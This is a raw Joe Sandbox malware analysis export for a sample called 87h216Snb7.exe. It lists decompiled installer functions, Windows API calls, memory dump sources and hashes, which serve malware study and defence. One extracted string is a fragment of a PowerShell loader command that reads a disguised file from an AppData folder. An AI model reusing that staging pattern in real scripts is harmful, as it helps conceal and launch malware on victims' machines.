                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                                            APIs
                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                            • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                                                                                            • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                                                                                                                            • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                                                                                            • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                                                                                                                            APIs
                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                            • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                                                                                            • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                                                                                                            • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                                                                                            • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                                                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                                                                                                              • Part of subcall function 004055C6: lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
                                                                                                                                                              • Part of subcall function 004055C6: SetWindowTextW.USER32(matrices,matrices), ref: 00405633
                                                                                                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                                                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                                                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                                                                                                              • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                                                                                                              • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                                              • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
                                                                                                                                                              • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
                                                                                                                                                              • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2972824698-0
                                                                                                                                                            • Opcode ID: 6661bbc6a6cbc62f2ae8f9ac3ffc578f0765c459b67b1fe30ee97d11a41af7f8
                                                                                                                                                            • Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
                                                                                                                                                            • Opcode Fuzzy Hash: 6661bbc6a6cbc62f2ae8f9ac3ffc578f0765c459b67b1fe30ee97d11a41af7f8
                                                                                                                                                            • Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E
                                                                                                                                                            APIs
                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                                                                                                                            • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
                                                                                                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                                                                                                                              • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                                                                                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\87h216Snb7.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                                                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                                                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\87h216Snb7.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                                                                                                              • Part of subcall function 004067EF: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                                                                                                                              • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                                                                                                              • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                                                                                                                              • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                                                                                                            Strings
                                                                                                                                                            • C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 00404B01
                                                                                                                                                            • "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tilta, xrefs: 004049CA
                                                                                                                                                            • A, xrefs: 00404AD4
                                                                                                                                                            • : Completed, xrefs: 00404B12, 00404B17, 00404B22
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                            • String ID: "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tilta$: Completed$A$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis
                                                                                                                                                            • API String ID: 2624150263-529700157
                                                                                                                                                            • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                                                                                                            • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                                                                                                                                            • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                                                                                                            • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                                                                                                                                            APIs
                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                                                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00405027
                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                                                                                                                              • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00405189
                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00405357
                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405367
                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00405511
                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405523
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                            • String ID: $M$N
                                                                                                                                                            • API String ID: 2564846305-813528018
                                                                                                                                                            • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                                                                                                            • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                                                                                                                                            • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                                                                                                            • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                                                                                                                                            APIs
                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                                                                                                                                            • GetSysColor.USER32(?), ref: 0040475F
                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404780
                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 00404802
                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404881
                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0040489D
                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                            • String ID: : Completed$N
                                                                                                                                                            • API String ID: 3103080414-2140067464
                                                                                                                                                            • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                                                                                                            • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                                                                                                                            • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                                                                                                            • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                                                                                                                                            APIs
                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                            • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                            • String ID: F
                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                            • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                                                                                            • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                                                                                                            • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                                                                                            • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                                                                                                            APIs
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                                                                                                                              • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                                                                                                              • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                                                                                                                            • wsprintfA.USER32 ref: 00406206
                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                                                                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                                                                                                                              • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                                                                                                              • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
